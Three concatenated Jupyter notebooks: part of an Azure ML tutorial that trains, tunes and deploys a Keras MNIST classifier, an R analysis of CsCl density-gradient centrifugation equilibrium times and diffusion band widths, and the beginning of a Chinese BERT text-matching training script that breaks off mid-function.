'test-images.gz'), False) / 255.0 y_train = load_data(os.path.join(data_folder, 'train-labels.gz'), True).reshape(-1) y_test = load_data(os.path.join(data_folder, 'test-labels.gz'), True).reshape(-1) # now let's show some randomly chosen images from the training set. 
count = 0 sample_size = 30 plt.figure(figsize = (16, 6)) for i in np.random.permutation(X_train.shape[0])[:sample_size]: count = count + 1 plt.subplot(1, sample_size, count) plt.axhline('') plt.axvline('') plt.text(x=10, y=-10, s=y_train[i], fontsize=18) plt.imshow(X_train[i].reshape(28, 28), cmap=plt.cm.Greys) plt.show() ``` Now you have an idea of what these images look like and the expected prediction outcome. ## Create a FileDataset A FileDataset references one or multiple files in your datastores or public urls. The files can be of any format. FileDataset provides you with the ability to download or mount the files to your compute. By creating a dataset, you create a reference to the data source location. If you applied any subsetting transformations to the dataset, they will be stored in the dataset as well. The data remains in its existing location, so no extra storage cost is incurred. [Learn More](https://aka.ms/azureml/howto/createdatasets) ``` from azureml.core.dataset import Dataset web_paths = [ 'http://yann.lecun.com/exdb/mnist/train-images-idx3-ubyte.gz', 'http://yann.lecun.com/exdb/mnist/train-labels-idx1-ubyte.gz', 'http://yann.lecun.com/exdb/mnist/t10k-images-idx3-ubyte.gz', 'http://yann.lecun.com/exdb/mnist/t10k-labels-idx1-ubyte.gz' ] dataset = Dataset.File.from_files(path = web_paths) ``` Use the `register()` method to register datasets to your workspace so they can be shared with others, reused across various experiments, and referred to by name in your training script. ``` dataset = dataset.register(workspace = ws, name = 'mnist dataset', description='training and test dataset', create_new_version=True) ``` ## Create or Attach existing AmlCompute You will need to create a [compute target](https://docs.microsoft.com/azure/machine-learning/service/concept-azure-machine-learning-architecture#compute-target) for training your model. In this tutorial, you create `AmlCompute` as your training compute resource. 
If we could not find the cluster with the given name, then we will create a new cluster here. We will create an `AmlCompute` cluster of `STANDARD_NC6` GPU VMs. This process is broken down into 3 steps: 1. create the configuration (this step is local and only takes a second) 2. create the cluster (this step will take about **20 seconds**) 3. provision the VMs to bring the cluster to the initial size (of 1 in this case). This step will take about **3-5 minutes** and is providing only sparse output in the process. Please make sure to wait until the call returns before moving to the next cell ``` from azureml.core.compute import ComputeTarget, AmlCompute from azureml.core.compute_target import ComputeTargetException # choose a name for your cluster cluster_name = "gpu-cluster" try: compute_target = ComputeTarget(workspace=ws, name=cluster_name) print('Found existing compute target') except ComputeTargetException: print('Creating a new compute target...') compute_config = AmlCompute.provisioning_configuration(vm_size='STANDARD_NC6', max_nodes=4) # create the cluster compute_target = ComputeTarget.create(ws, cluster_name, compute_config) # can poll for a minimum number of nodes and for a specific timeout. # if no min node count is provided it uses the scale settings for the cluster compute_target.wait_for_completion(show_output=True, min_node_count=None, timeout_in_minutes=20) # use get_status() to get a detailed status for the current cluster. print(compute_target.get_status().serialize()) ``` Now that you have created the compute target, let's see what the workspace's `compute_targets` property returns. You should now see one entry named "gpu-cluster" of type `AmlCompute`. ``` compute_targets = ws.compute_targets for name, ct in compute_targets.items(): print(name, ct.type, ct.provisioning_state) ``` ## Copy the training files into the script folder The Keras training script is already created for you. 
You can simply copy it into the script folder, together with the utility library used to load compressed data file into numpy array. ``` import shutil # the training logic is in the keras_mnist.py file. shutil.copy('./keras_mnist.py', script_folder) # the utils.py just helps loading data from the downloaded MNIST dataset into numpy arrays. shutil.copy('./utils.py', script_folder) ``` ## Construct neural network in Keras In the training script `keras_mnist.py`, it creates a very simple DNN (deep neural network), with just 2 hidden layers. The input layer has 28 * 28 = 784 neurons, each representing a pixel in an image. The first hidden layer has 300 neurons, and the second hidden layer has 100 neurons. The output layer has 10 neurons, each representing a targeted label from 0 to 9. ![DNN](nn.png) ### Azure ML concepts Please note the following three things in the code below: 1. The script accepts arguments using the argparse package. In this case there is one argument `--data_folder` which specifies the FileDataset in which the script can find the MNIST data ``` parser = argparse.ArgumentParser() parser.add_argument('--data_folder') ``` 2. The script is accessing the Azure ML `Run` object by executing `run = Run.get_context()`. Further down the script is using the `run` to report the loss and accuracy at the end of each epoch via callback. ``` run.log('Loss', log['loss']) run.log('Accuracy', log['acc']) ``` 3. When running the script on Azure ML, you can write files out to a folder `./outputs` that is relative to the root directory. This folder is specially tracked by Azure ML in the sense that any files written to that folder during script execution on the remote target will be picked up by Run History; these files (known as artifacts) will be available as part of the run history record. The next cell will print out the training code for you to inspect. 
``` with open(os.path.join(script_folder, './keras_mnist.py'), 'r') as f: print(f.read()) ``` ## Create TensorFlow estimator & add Keras Next, we construct an `azureml.train.dnn.TensorFlow` estimator object, use the `gpu-cluster` as compute target, and pass the mount-point of the datastore to the training code as a parameter. The TensorFlow estimator is providing a simple way of launching a TensorFlow training job on a compute target. It will automatically provide a docker image that has TensorFlow installed. In this case, we add `keras` package (for the Keras framework obviously), and `matplotlib` package for plotting a "Loss vs. Accuracy" chart and record it in run history. ``` dataset = Dataset.get_by_name(ws, 'mnist dataset') # list the files referenced by mnist dataset dataset.to_path() from azureml.train.dnn import TensorFlow script_params = { '--data-folder': dataset.as_named_input('mnist').as_mount(), '--batch-size': 50, '--first-layer-neurons': 300, '--second-layer-neurons': 100, '--learning-rate': 0.001 } est = TensorFlow(source_directory=script_folder, script_params=script_params, compute_target=compute_target, entry_script='keras_mnist.py', pip_packages=['keras==2.2.5','azureml-dataprep[pandas,fuse]','matplotlib']) ``` ## Submit job to run Submit the estimator to the Azure ML experiment to kick off the execution. ``` run = exp.submit(est) ``` ### Monitor the Run As the Run is executed, it will go through the following stages: 1. Preparing: A docker image is created matching the Python environment specified by the TensorFlow estimator and it will be uploaded to the workspace's Azure Container Registry. This step will only happen once for each Python environment -- the container will then be cached for subsequent runs. Creating and uploading the image takes about **5 minutes**. While the job is preparing, logs are streamed to the run history and can be viewed to monitor the progress of the image creation. 2. 
Scaling: If the compute needs to be scaled up (i.e. the AmlCompute cluster requires more nodes to execute the run than currently available), the cluster will attempt to scale up in order to make the required amount of nodes available. Scaling typically takes about **5 minutes**. 3. Running: All scripts in the script folder are uploaded to the compute target, data stores are mounted/copied and the `entry_script` is executed. While the job is running, stdout and the `./logs` folder are streamed to the run history and can be viewed to monitor the progress of the run. 4. Post-Processing: The `./outputs` folder of the run is copied over to the run history There are multiple ways to check the progress of a running job. We can use a Jupyter notebook widget. **Note: The widget will automatically update ever 10-15 seconds, always showing you the most up-to-date information about the run** ``` from azureml.widgets import RunDetails RunDetails(run).show() ``` We can also periodically check the status of the run object, and navigate to Azure portal to monitor the run. ``` run run.wait_for_completion(show_output=True) ``` In the outputs of the training script, it prints out the Keras version number. Please make a note of it. ### The Run object The Run object provides the interface to the run history -- both to the job and to the control plane (this notebook), and both while the job is running and after it has completed. It provides a number of interesting features for instance: * `run.get_details()`: Provides a rich set of properties of the run * `run.get_metrics()`: Provides a dictionary with all the metrics that were reported for the Run * `run.get_file_names()`: List all the files that were uploaded to the run history for this Run. This will include the `outputs` and `logs` folder, azureml-logs and other logs, as well as files that were explicitly uploaded to the run using `run.upload_file()` Below are some examples -- please run through them and inspect their output. 
``` run.get_details() run.get_metrics() run.get_file_names() ``` ## Download the saved model In the training script, the Keras model is saved into two files, `model.json` and `model.h5`, in the `outputs/models` folder on the gpu-cluster AmlCompute node. Azure ML automatically uploaded anything written in the `./outputs` folder into run history file store. Subsequently, we can use the `run` object to download the model files. They are under the the `outputs/model` folder in the run history file store, and are downloaded into a local folder named `model`. ``` # create a model folder in the current directory os.makedirs('./model', exist_ok=True) for f in run.get_file_names(): if f.startswith('outputs/model'): output_file_path = os.path.join('./model', f.split('/')[-1]) print('Downloading from {} to {} ...'.format(f, output_file_path)) run.download_file(name=f, output_file_path=output_file_path) ``` ## Predict on the test set Let's check the version of the local Keras. Make sure it matches with the version number printed out in the training script. Otherwise you might not be able to load the model properly. ``` import keras import tensorflow as tf print("Keras version:", keras.__version__) print("Tensorflow version:", tf.__version__) ``` Now let's load the downloaded model. ``` from keras.models import model_from_json # load json and create model json_file = open('model/model.json', 'r') loaded_model_json = json_file.read() json_file.close() loaded_model = model_from_json(loaded_model_json) # load weights into new model loaded_model.load_weights("model/model.h5") print("Model loaded from disk.") ``` Feed test dataset to the persisted model to get predictions. 
``` # evaluate loaded model on test data loaded_model.compile(loss='binary_crossentropy', optimizer='rmsprop', metrics=['accuracy']) y_test_ohe = one_hot_encode(y_test, 10) y_hat = np.argmax(loaded_model.predict(X_test), axis=1) # print the first 30 labels and predictions print('labels: \t', y_test[:30]) print('predictions:\t', y_hat[:30]) ``` Calculate the overall accuracy by comparing the predicted value against the test set. ``` print("Accuracy on the test set:", np.average(y_hat == y_test)) ``` ## Intelligent hyperparameter tuning We have trained the model with one set of hyperparameters, now let's how we can do hyperparameter tuning by launching multiple runs on the cluster. First let's define the parameter space using random sampling. ``` from azureml.train.hyperdrive import RandomParameterSampling, BanditPolicy, HyperDriveConfig, PrimaryMetricGoal from azureml.train.hyperdrive import choice, loguniform ps = RandomParameterSampling( { '--batch-size': choice(25, 50, 100), '--first-layer-neurons': choice(10, 50, 200, 300, 500), '--second-layer-neurons': choice(10, 50, 200, 500), '--learning-rate': loguniform(-6, -1) } ) ``` Next, we will create a new estimator without the above parameters since they will be passed in later by Hyperdrive configuration. Note we still need to keep the `data-folder` parameter since that's not a hyperparamter we will sweep. ``` est = TensorFlow(source_directory=script_folder, script_params={'--data-folder': dataset.as_named_input('mnist').as_mount()}, compute_target=compute_target, entry_script='keras_mnist.py', pip_packages=['keras==2.2.5','azureml-dataprep[pandas,fuse]','matplotlib']) ``` Now we will define an early termnination policy. The `BanditPolicy` basically states to check the job every 2 iterations. If the primary metric (defined later) falls outside of the top 10% range, Azure ML terminate the job. This saves us from continuing to explore hyperparameters that don't show promise of helping reach our target metric. 
``` policy = BanditPolicy(evaluation_interval=2, slack_factor=0.1) ``` Now we are ready to configure a run configuration object, and specify the primary metric `Accuracy` that's recorded in your training runs. If you go back to visit the training script, you will notice that this value is being logged after every epoch (a full batch set). We also want to tell the service that we are looking to maximizing this value. We also set the number of samples to 20, and maximal concurrent job to 4, which is the same as the number of nodes in our computer cluster. ``` hdc = HyperDriveConfig(estimator=est, hyperparameter_sampling=ps, policy=policy, primary_metric_name='Accuracy', primary_metric_goal=PrimaryMetricGoal.MAXIMIZE, max_total_runs=20, max_concurrent_runs=4) ``` Finally, let's launch the hyperparameter tuning job. ``` hdr = exp.submit(config=hdc) ``` We can use a run history widget to show the progress. Be patient as this might take a while to complete. ``` RunDetails(hdr).show() hdr.wait_for_completion(show_output=True) ``` ### Warm start a Hyperparameter Tuning experiment and resuming child runs Often times, finding the best hyperparameter values for your model can be an iterative process, needing multiple tuning runs that learn from previous hyperparameter tuning runs. Reusing knowledge from these previous runs will accelerate the hyperparameter tuning process, thereby reducing the cost of tuning the model and will potentially improve the primary metric of the resulting model. When warm starting a hyperparameter tuning experiment with Bayesian sampling, trials from the previous run will be used as prior knowledge to intelligently pick new samples, so as to improve the primary metric. Additionally, when using Random or Grid sampling, any early termination decisions will leverage metrics from the previous runs to determine poorly performing training runs. 
Azure Machine Learning allows you to warm start your hyperparameter tuning run by leveraging knowledge from up to 5 previously completed hyperparameter tuning parent runs. Additionally, there might be occasions when individual training runs of a hyperparameter tuning experiment are cancelled due to budget constraints or fail due to other reasons. It is now possible to resume such individual training runs from the last checkpoint (assuming your training script handles checkpoints). Resuming an individual training run will use the same hyperparameter configuration and mount the storage used for that run. The training script should accept the "--resume-from" argument, which contains the checkpoint or model files from which to resume the training run. You can also resume individual runs as part of an experiment that spends additional budget on hyperparameter tuning. Any additional budget, after resuming the specified training runs is used for exploring additional configurations. For more information on warm starting and resuming hyperparameter tuning runs, please refer to the [Hyperparameter Tuning for Azure Machine Learning documentation](https://docs.microsoft.com/en-us/azure/machine-learning/service/how-to-tune-hyperparameters) ## Find and register best model When all the jobs finish, we can find out the one that has the highest accuracy. ``` best_run = hdr.get_best_run_by_primary_metric() print(best_run.get_details()['runDefinition']['arguments']) ``` Now let's list the model files uploaded during the run. ``` print(best_run.get_file_names()) ``` We can then register the folder (and all files in it) as a model named `keras-dnn-mnist` under the workspace for deployment. ``` model = best_run.register_model(model_name='keras-mlp-mnist', model_path='outputs/model') ``` ## Deploy the model in ACI Now we are ready to deploy the model as a web service running in Azure Container Instance [ACI](https://azure.microsoft.com/en-us/services/container-instances/). 
Azure Machine Learning accomplishes this by constructing a Docker image with the scoring logic and model baked in. ### Create score.py First, we will create a scoring script that will be invoked by the web service call. * Note that the scoring script must have two required functions, `init()` and `run(input_data)`. * In `init()` function, you typically load the model into a global object. This function is executed only once when the Docker container is started. * In `run(input_data)` function, the model is used to predict a value based on the input data. The input and output to `run` typically use JSON as serialization and de-serialization format but you are not limited to that. ``` %%writefile score.py import json import numpy as np import os from keras.models import model_from_json from azureml.core.model import Model def init(): global model model_root = Model.get_model_path('keras-mlp-mnist') # load json and create model json_file = open(os.path.join(model_root, 'model.json'), 'r') model_json = json_file.read() json_file.close() model = model_from_json(model_json) # load weights into new model model.load_weights(os.path.join(model_root, "model.h5")) model.compile(loss='binary_crossentropy', optimizer='rmsprop', metrics=['accuracy']) def run(raw_data): data = np.array(json.loads(raw_data)['data']) # make prediction y_hat = np.argmax(model.predict(data), axis=1) return y_hat.tolist() ``` ### Create myenv.yml We also need to create an environment file so that Azure Machine Learning can install the necessary packages in the Docker image which are required by your scoring script. In this case, we need to specify conda packages `tensorflow` and `keras`. ``` from azureml.core.conda_dependencies import CondaDependencies cd = CondaDependencies.create() cd.add_tensorflow_conda_package() cd.add_conda_package('keras==2.2.5') cd.save_to_file(base_directory='./', conda_file_path='myenv.yml') print(cd.serialize_to_string()) ``` ### Deploy to ACI We are almost ready to deploy. 
Create the inference configuration and deployment configuration and deploy to ACI. This cell will run for about 7-8 minutes. ``` from azureml.core.webservice import AciWebservice from azureml.core.model import InferenceConfig from azureml.core.model import Model inference_config = InferenceConfig(runtime= "python", entry_script="score.py", conda_file="myenv.yml") aciconfig = AciWebservice.deploy_configuration(cpu_cores=1, auth_enabled=True, # this flag generates API keys to secure access memory_gb=1, tags={'name': 'mnist', 'framework': 'Keras'}, description='Keras MLP on MNIST') service = Model.deploy(workspace=ws, name='keras-mnist-svc', models=[model], inference_config=inference_config, deployment_config=aciconfig) service.wait_for_deployment(True) print(service.state) ``` **Tip: If something goes wrong with the deployment, the first thing to look at is the logs from the service by running the following command:** `print(service.get_logs())` This is the scoring web service endpoint: ``` print(service.scoring_uri) ``` ### Test the deployed model Let's test the deployed model. Pick 30 random samples from the test set, and send it to the web service hosted in ACI. Note here we are using the `run` API in the SDK to invoke the service. You can also make raw HTTP calls using any HTTP tool such as curl. After the invocation, we print the returned predictions and plot them along with the input images. Use red font color and inversed image (white on black) to highlight the misclassified samples. Note since the model accuracy is pretty high, you might have to run the below cell a few times before you can see a misclassified sample. 
``` import json # find 30 random samples from test set n = 30 sample_indices = np.random.permutation(X_test.shape[0])[0:n] test_samples = json.dumps({"data": X_test[sample_indices].tolist()}) test_samples = bytes(test_samples, encoding='utf8') # predict using the deployed model result = service.run(input_data=test_samples) # compare actual value vs. the predicted values: i = 0 plt.figure(figsize = (20, 1)) for s in sample_indices: plt.subplot(1, n, i + 1) plt.axhline('') plt.axvline('') # use different color for misclassified sample font_color = 'red' if y_test[s] != result[i] else 'black' clr_map = plt.cm.gray if y_test[s] != result[i] else plt.cm.Greys plt.text(x=10, y=-10, s=y_test[s], fontsize=18, color=font_color) plt.imshow(X_test[s].reshape(28, 28), cmap=clr_map) i = i + 1 plt.show() ``` We can retrieve the API keys used for accessing the HTTP endpoint. ``` # Retrieve the API keys. Two keys were generated. key1, Key2 = service.get_keys() print(key1) ``` We can now send construct raw HTTP request and send to the service. Don't forget to add key to the HTTP header. ``` import requests # send a random row from the test set to score random_index = np.random.randint(0, len(X_test)-1) input_data = "{\"data\": [" + str(list(X_test[random_index])) + "]}" headers = {'Content-Type':'application/json', 'Authorization': 'Bearer ' + key1} resp = requests.post(service.scoring_uri, input_data, headers=headers) print("POST to url", service.scoring_uri) #print("input data:", input_data) print("label:", y_test[random_index]) print("prediction:", resp.text) ``` Let's look at the workspace after the web service was deployed. 
You should see

* a registered model named 'keras-mlp-mnist' and with the id 'model:1'
* a webservice called 'keras-mnist-svc' with some scoring URL

```
# list every model registered in the workspace, with its id
models = ws.models
for name, model in models.items():
    print("Model: {}, ID: {}".format(name, model.id))

# list every deployed webservice, with its scoring endpoint
webservices = ws.webservices
for name, webservice in webservices.items():
    print("Webservice: {}, scoring URI: {}".format(name, webservice.scoring_uri))
```

## Clean up

You can delete the ACI deployment with a simple delete API call.

```
# tear down the ACI webservice so it stops accruing cost
service.delete()
```
github_jupyter
# Description * Determining how differences in our isopycnic cfg conditions vary in meaningful ways from those of Clay et al., 2003. Eur Biophys J * Needed to determine whether the Clay et al., 2003 function describing diffusion is applicable to our data > standard conditions from: Clay et al., 2003. Eur Biophys J * Standard conditions: * 44k rev/min for Beckman XL-A * An-50 Ti Rotor * 44.77k rev/min for Beckman model E * 35k rev/min for preparative ultra-cfg & fractionation * De Sario et al., 1995: vertical rotor: VTi90 (Beckman) * 35k rpm for 16.5 h * Our conditions: * speed (R) = 55k rev/min * radius top/bottom (cm) = 2.6, 4.85 * angular velocity: w = `((2 * 3.14159 * R)/60)^2` * TLA110 rotor ``` import numpy as np %load_ext rpy2.ipython %%R library(ggplot2) library(dplyr) ``` ### Beckman XL-A ### Beckman model E # Angular velocity (omega) ``` # angular velocity: our setup angular_vel_f = lambda R: (2 * 3.14159 * R / 60) print angular_vel_f(55000) # angular velocity: De Sario et al., 1995 print angular_vel_f(35000) ``` # Meselson et al., 1957 equation on s.d. 
of band due to diffusion \begin{equation} \sigma^2 = \frac{RT}{M_{PX_n}\bar{\upsilon}_{PX_n} (\frac{dp}{dr})_{r_0} \omega^2 r_0} \end{equation} * R = gas constant * T = temperature (C) * M = molecular weight * PX_n = macromolecular electrolyte * v = partial specific volume (mL/g) * w = angular velocity * r_0 = distance between the band center and rotor center * dp/dr = density gradient # Time to equilibrium: vertical rotor radius_max - radius_min = width_of_tube * VTi90 Rotor * radius_max = 71.1 mm * radius_min = 57.9 mm ``` %%R -w 14 -h 6 -u in library(ggplot2) library(reshape) library(grid) # radius top,bottom (cm) r.top = 57.9 / 10 r.bottom = 71.1 / 10 # isoconcentration point I = sqrt((r.top^2 + r.top * r.bottom + r.bottom^2)/3) # rpm R = 35000 # particle density D = 1.70 # beta^o B = 1.14e9 # dna in bp from 0.1kb - 100kb L = seq(100, 100000, 100) # angular velocity ## 2*pi*rpm / 60 w = ((2 * 3.14159 * R)/60)^2 # DNA GC content G.C = seq(0.1, 0.9, 0.05) # Molecular weight # M.W in relation to GC content (dsDNA) A = 313.2 T = 304.2 C = 289.2 G = 329.2 GC = G + C AT = A + T #GC2MW = function(x){ x*GC + (1-x)*AT + 157 } # assuming 5' monophosphate on end of molecules GC2MW = function(x){ x*GC + (1-x)*AT } M.W = sapply(G.C, GC2MW) # buoyant density ## GC_fraction = (p - 1.66) / 0.098 GC2buoyant.density = function(x){ (x * 0.098) + 1.66 } B.D = GC2buoyant.density(G.C) # radius of the isoconcentration point from cfg center (AKA: r.p) ## position of the particle at equilibrium buoyant.density2radius = function(x){ sqrt( ((x-D)*2*B/w) + I^2 ) } P = buoyant.density2radius(B.D) # calculating S S.fun = function(L){ 2.8 + (0.00834 * (L*M.W)^0.479) } S = t(sapply( L, S.fun )) # calculating T T = matrix(ncol=17, nrow=length(L)) for(i in 1:ncol(S)){ T[,i] = 1.13e14 * B * (D-1) / (R^4 * P[i]^2 * S[,i]) } ## formating T = as.data.frame(T) colnames(T) = G.C T$dna_size__kb = L / 1000 T.m = melt(T, id.vars=c('dna_size__kb')) colnames(T.m) = c('dna_size__kb', 'GC_content', 
'time__h') #T.m$GC_content = as.numeric(as.character(T.m$GC_content)) ## plotting p = ggplot(T.m, aes(dna_size__kb, time__h, color=GC_content, group=GC_content)) + geom_line() + scale_y_continuous(limits=c(0,175)) + labs(x='DNA length (kb)', y='Time (hr)') + scale_color_discrete(name='GC content') + #geom_hline(yintercept=66, linetype='dashed', alpha=0.5) + theme( text = element_text(size=18) ) #print(p) # plotting at small scale p.sub = ggplot(T.m, aes(dna_size__kb, time__h, color=GC_content, group=GC_content)) + geom_line() + scale_x_continuous(limits=c(0,5)) + scale_y_continuous(limits=c(0,175)) + labs(x='DNA length (kb)', y='Time (hr)') + scale_color_discrete(name='GC content') + #geom_hline(yintercept=66, linetype='dashed', alpha=0.5) + theme( text = element_text(size=14), legend.position = 'none' ) vp = viewport(width=0.43, height=0.52, x = 0.65, y = 0.68) print(p) print(p.sub, vp=vp) ``` # Plotting band s.d. as defined the ultra-cfg technical manual ### density gradient \begin{equation} \frac{d\rho}{dr} = \frac{\omega^2r}{\beta} \end{equation} ### band standard deviation \begin{equation} \sigma^2 = \frac{\theta}{M_{app}}\frac{RT}{(\frac{d\rho}{dr})_{eff} \omega^2r_o} \end{equation} ### combined \begin{equation} \sigma^2 = \frac{\theta}{M_{app}}\frac{RT}{\frac{\omega^4r_o^2}{\beta}} \end{equation} ### buoyant density of a molecule \begin{equation} \theta = \rho_i + \frac{\omega^2}{2\beta}(r_o^2 - r_1^2) \end{equation} ### standard deviation due to diffusion (Clay et al., 2003) \begin{equation} \sigma_{diffusion}^2 = \Big(\frac{100%}{0.098}\Big)^2 \frac{\rho RT}{\beta_B^2GM_{Cs}} \frac{1}{1000l} \end{equation} ``` %%R # gas constant R = 8.3144621e7 #J / mol*K # temp T = 273.15 + 23 # 23oC # rotor speed (rpm) S = 55000 # beta^o beta = 1.14 * 10^-9 #beta = 1.195 * 10^-10 # G G = 7.87 * 10^10 #cgs # angular velocity ## 2*pi*rpm / 60 omega = 2 * pi * S /60 # GC GC = seq(0,1,0.1) # lengths lens = seq(1000, 100000, 10000) # molecular weight GC2MW.dry = function(x){ 
A = 313.2 T = 304.2 C = 289.2 G = 329.2 GC = G + C AT = A + T x*GC + (1-x)*AT } M.dry = sapply(GC, GC2MW) GC2MW.dryCS = function(n){ #n = number of bases #base pair = 665 daltons #base pair per dry cesium DNA = 665 * 4/3 ~= 882 return(n * 882) } M.dryCS = sapply(lens, GC2MW.dryCS) # BD GC2BD = function(x){ (x * 0.098) + 1.66 } rho = sapply(GC, GC2BD) # sd calc_s.d = function(p=1.72, L=50000, T=298, B=1.195e9, G=7.87e-10, M=882){ R = 8.3145e7 x = (100 / 0.098)^2 * ((p*R*T)/(B^2*G*L*M)) return(x) } # run p=seq(1.7, 1.75, 0.01) L=seq(1000, 50000, 1000) m = outer(p, L, calc_s.d) rownames(m) = p colnames(m) = L %%R # gas constant R = 8.3144621e7 #J / mol*K # temp T = 273.15 + 23 # 23oC # rotor speed (rpm) S = 55000 # beta^o beta = 1.14 * 10^-9 #beta = 1.195 * 10^-10 # G G = 7.87 * 10^10 #cgs # angular velocity ## 2*pi*rpm / 60 omega = 2 * pi * S /60 # GC GC = seq(0,1,0.1) # lengths lens = seq(1000, 100000, 10000) # molecular weight GC2MW.dry = function(x){ A = 313.2 T = 304.2 C = 289.2 G = 329.2 GC = G + C AT = A + T x*GC + (1-x)*AT } #GC2MW = function(x){ x*GC + (1-x)*AT } M.dry = sapply(GC, GC2MW.dry) GC2MW.dryCS = function(n){ #n = number of bases #base pair = 665 daltons #base pair per dry cesium DNA = 665 * 4/3 ~= 882 return(n * 882) } M.dryCS = sapply(lens, GC2MW.dryCS) # BD GC2BD = function(x){ (x * 0.098) + 1.66 } rho = sapply(GC, GC2BD) # sd calc_s.d = function(p=1.72, L=50000, T=298, B=1.195e9, G=7.87e-10, M=882){ R = 8.3145e7 x = (100 / 0.098)^2 * ((p*R*T)/(B^2*G*L*M)) return(sqrt(x)) } # run p=seq(1.7, 1.75, 0.01) L=seq(500, 50000, 500) m = outer(p, L, calc_s.d) rownames(m) = p colnames(m) = L %%R heatmap(m, Rowv=NA, Colv=NA) %%R -w 500 -h 350 df = as.data.frame(list('fragment_length'=as.numeric(colnames(m)), 'GC_sd'=m[1,])) #df$GC_sd = sqrt(df$GC_var) ggplot(df, aes(fragment_length, GC_sd)) + geom_line() + geom_vline(xintercept=4000, linetype='dashed', alpha=0.6) + labs(x='fragment length (bp)', y='G+C s.d.') + theme( text = element_text(size=16) ) ``` 
__Notes:__

* Small fragment size (<4000 bp) leads to large standard deviations in realized G+C

```
%%R
# Buoyant-density standard deviation due to diffusion (Clay et al., 2003):
#   sigma = sqrt( p*R*T / (B^2 * G * L * M) )
# p = buoyant density, L = fragment length (bp), T = temperature (K),
# B = beta coefficient, G = constant (cgs), M = daltons per bp of dry cesium DNA
calc_s.d = function(p=1.72, L=50000, T=298, B=1.195e9, G=7.87e-10, M=882){
    R = 8.3145e7   # gas constant (erg / (mol*K))
    sigma_sq = (p*R*T)/(B^2*G*L*M)
    return(sqrt(sigma_sq))
}

# run: s.d. over a grid of buoyant densities (rows) x fragment lengths (columns)
p=seq(1.7, 1.75, 0.01)
L=seq(500, 50000, 500)
m = outer(p, L, calc_s.d)
rownames(m) = p
colnames(m) = L
head(m)

%%R
# quick overview of the s.d. surface
heatmap(m, Rowv=NA, Colv=NA)

%%R -w 500 -h 350
# s.d. vs fragment length at ~50% G+C (BD = 0.098*GC + 1.66)
BD50 = 0.098 * 0.5 + 1.66
# NOTE(review): BD50 (= 1.709) is used as a *numeric* row index into m rather than
# matched against the character rownames ("1.7", "1.71", ...) — confirm this
# selects the intended buoyant-density row.
df = as.data.frame(list('fragment_length'=as.numeric(colnames(m)),
                        'BD_sd'=m[BD50,]))
ggplot(df, aes(fragment_length, BD_sd)) +
    geom_line() +
    geom_vline(xintercept=4000, linetype='dashed', alpha=0.6) +
    labs(x='fragment length (bp)', y='G+C s.d.') +
    theme( text = element_text(size=16) )
```
github_jupyter
```
# --- Colab environment setup -------------------------------------------------
from google.colab import drive
drive.mount('/content/gdrive')
import os
os.chdir('/content/gdrive/My Drive/finch/tensorflow2/text_matching/joint/main')
%tensorflow_version 2.x
!pip install transformers

from transformers import BertTokenizer, TFBertModel
from sklearn.metrics import classification_report
import tensorflow as tf
import tensorflow_addons as tfa
import numpy as np
import pprint
import logging
import time
import math
import json
import csv

print("TensorFlow Version", tf.__version__)
print('GPU Enabled:', tf.test.is_gpu_available())

# Hyper-parameters for jointly fine-tuning Chinese BERT on two text-matching
# corpora: a CSV corpus and a JSON corpus (see the data generators below).
params = {
    'pretrain_path': 'bert-base-chinese',
    'train_path': '../data/train.json',
    'test_path': '../data/dev.json',
    'batch_size': 32,
    'max_len': 128,                 # max BERT input length incl. [CLS]/[SEP]
    'buffer_size': 34334 + 100000,  # shuffle buffer; presumably combined train size — TODO confirm
    'init_lr': 1e-5,
    'max_lr': 3e-5,
    'n_epochs': 12,
    'clip_norm': 5.,
    'label_smooth': .0,
    'num_patience': 7,              # epochs without improvement before stopping
}

tokenizer = BertTokenizer.from_pretrained(params['pretrain_path'],
                                          lowercase = True,
                                          add_special_tokens = True)


def get_vocab(f_path):
    """Read one token per line and return a {token: line_index} mapping."""
    k2v = {}
    with open(f_path) as f:
        for i, line in enumerate(f):
            line = line.rstrip()
            k2v[line] = i
    return k2v


def data_gen_cs():
    """Yield ((token_ids, segment_ids), label) pairs from the CSV test set."""
    f_path = '../data/test.csv'
    with open(f_path) as f:
        print('Reading', f_path)
        for i, line in enumerate(csv.reader(f, delimiter=',')):
            if i == 0:
                continue  # skip the CSV header row
            text1, text2, label = line
            # Truncate both sentences evenly so the pair plus the three
            # special tokens fits inside max_len.
            if len(text1) + len(text2) + 3 > params['max_len']:
                _max_len = (params['max_len'] - 3) // 2
                text1 = text1[:_max_len]
                text2 = text2[:_max_len]
            text1 = list(text1)  # character-level tokenization (Chinese text)
            text2 = list(text2)
            text = ['[CLS]'] + text1 + ['[SEP]'] + text2 + ['[SEP]']
            # Segment ids: 0 for [CLS] + sentence A (+ its [SEP]), 1 for sentence B.
            seg = [0] + [0] * len(text1) + [0] + [1] * len(text2) + [1]
            text = tokenizer.convert_tokens_to_ids(text)
            yield ((text, seg), int(label))


def data_gen_js():
    """Yield ((token_ids, segment_ids), label) pairs from the JSON dev set."""
    f_path = '../data/dev.json'
    with open(f_path) as f:
        print('Reading', f_path)
        for line in f:
            line = json.loads(line.rstrip())
            text1, text2, label = line['sentence1'], line['sentence2'], line['label']
            if len(text1) + len(text2) + 3 > params['max_len']:
                _max_len = (params['max_len'] - 3) // 2
                text1 = text1[:_max_len]
                text2 = text2[:_max_len]
            text1 = list(text1)
            text2 = list(text2)
            text = ['[CLS]'] + text1 + ['[SEP]'] + text2 + ['[SEP]']
            seg = [0] + [0] * len(text1) + [0] + [1] * len(text2) + [1]
            text = tokenizer.convert_tokens_to_ids(text)
            yield ((text, seg), int(label))


def joint_data_gen():
    """Yield training examples from BOTH corpora (CSV train then JSON train)."""
    f_path = '../data/train.csv'
    with open(f_path) as f:
        print('Reading', f_path)
        for i, line in enumerate(csv.reader(f, delimiter=',')):
            if i == 0:
                continue  # skip the CSV header row
            text1, text2, label = line
            if len(text1) + len(text2) + 3 > params['max_len']:
                _max_len = (params['max_len'] - 3) // 2
                text1 = text1[:_max_len]
                text2 = text2[:_max_len]
            text1 = list(text1)
            text2 = list(text2)
            text = ['[CLS]'] + text1 + ['[SEP]'] + text2 + ['[SEP]']
            seg = [0] + [0] * len(text1) + [0] + [1] * len(text2) + [1]
            text = tokenizer.convert_tokens_to_ids(text)
            yield ((text, seg), int(label))
    f_path = '../data/train.json'
    with open(f_path) as f:
        print('Reading', f_path)
        for line in f:
            line = json.loads(line.rstrip())
            text1, text2, label = line['sentence1'], line['sentence2'], line['label']
            if len(text1) + len(text2) + 3 > params['max_len']:
                _max_len = (params['max_len'] - 3) // 2
                text1 = text1[:_max_len]
